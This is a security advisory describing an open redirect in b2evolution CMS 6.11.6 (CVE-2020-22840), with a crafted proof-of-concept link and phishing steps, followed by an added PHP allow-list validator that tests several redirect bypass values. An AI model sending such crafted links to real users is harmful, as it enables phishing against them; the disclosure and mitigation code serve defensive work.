b2evolution CMS 6.11.6 Open Redirection

2021-02-10 00:00:00
Nakul Ratti
packetstormsecurity.com
```text
# Exploit Title: Open redirect in b2evolution CMS 6.11.6 redirect_to parameter in email_passthrough.php
# Google Dork: N/A
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22840

Vulnerable File:
--------------------------
http://host/htsrv/email_passthrough.php <http://host/evoadm.php>

Vulnerable Issue:
--------------------------
The redirect_to parameter has no input validation or domain whitelisting.

--------------------------Proof of Concept-----------------------
Steps to Reproduce:

1. Send the following link to the unsuspecting user:
http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com
2. The user will be redirected to Google.com or any other attacker-controlled domain.
3. This can be used to perform malicious phishing campaigns on unsuspecting users.
```
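The mitigation the advisory points at (validating redirect_to against the site's own host instead of redirecting blindly), as an added PHP example; this is not b2evolution's code or the advisory authors' work, and the function names, the site host and the sample targets are assumptions.

```php
<?php
// Added example (not b2evolution's own code): allow-list validation for a
// redirect_to parameter, mitigating the open redirect described above.
// $siteHost is assumed to be the canonical host of the b2evolution install.

function is_safe_redirect(string $redirectTo, string $siteHost): bool
{
    // Reject empty values, control characters and whitespace (header injection, parser confusion).
    if ($redirectTo === '' || preg_match('/[\x00-\x20\x7f]/', $redirectTo)) {
        return false;
    }
    // Browsers treat backslashes like forward slashes, so "/\evil.example" is scheme-relative too.
    $candidate = str_replace('\\', '/', $redirectTo);

    // Same-site relative path: exactly one leading slash; "//evil.example" would leave the site.
    if ($candidate[0] === '/') {
        return substr($candidate, 0, 2) !== '//';
    }

    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // no scheme or host: ambiguous input such as "google.com" or "javascript:..."
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Userinfo ("http://127.0.0.1@evil.example") is a classic bypass of naive host checks.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    return strtolower($parts['host']) === strtolower($siteHost);
}

// Decide where to send the user: the validated target, or a safe default on this site.
function choose_redirect(?string $redirectTo, string $siteHost, string $fallback = '/'): string
{
    return ($redirectTo !== null && is_safe_redirect($redirectTo, $siteHost)) ? $redirectTo : $fallback;
}

// Constructed sample values, including the redirect_to value from the advisory's PoC.
$host = '127.0.0.1';
foreach ([
    'http://google.com',            // advisory PoC value: rejected, falls back to '/'
    '//google.com/',                // scheme-relative: rejected
    'http://127.0.0.1@google.com/', // userinfo trick: rejected
    '/index.php?blog=1',            // same-site relative path: accepted
    'http://127.0.0.1/index.php',   // absolute URL on the site host: accepted
] as $target) {
    printf("%-32s -> %s\n", $target, choose_redirect($target, $host));
}
```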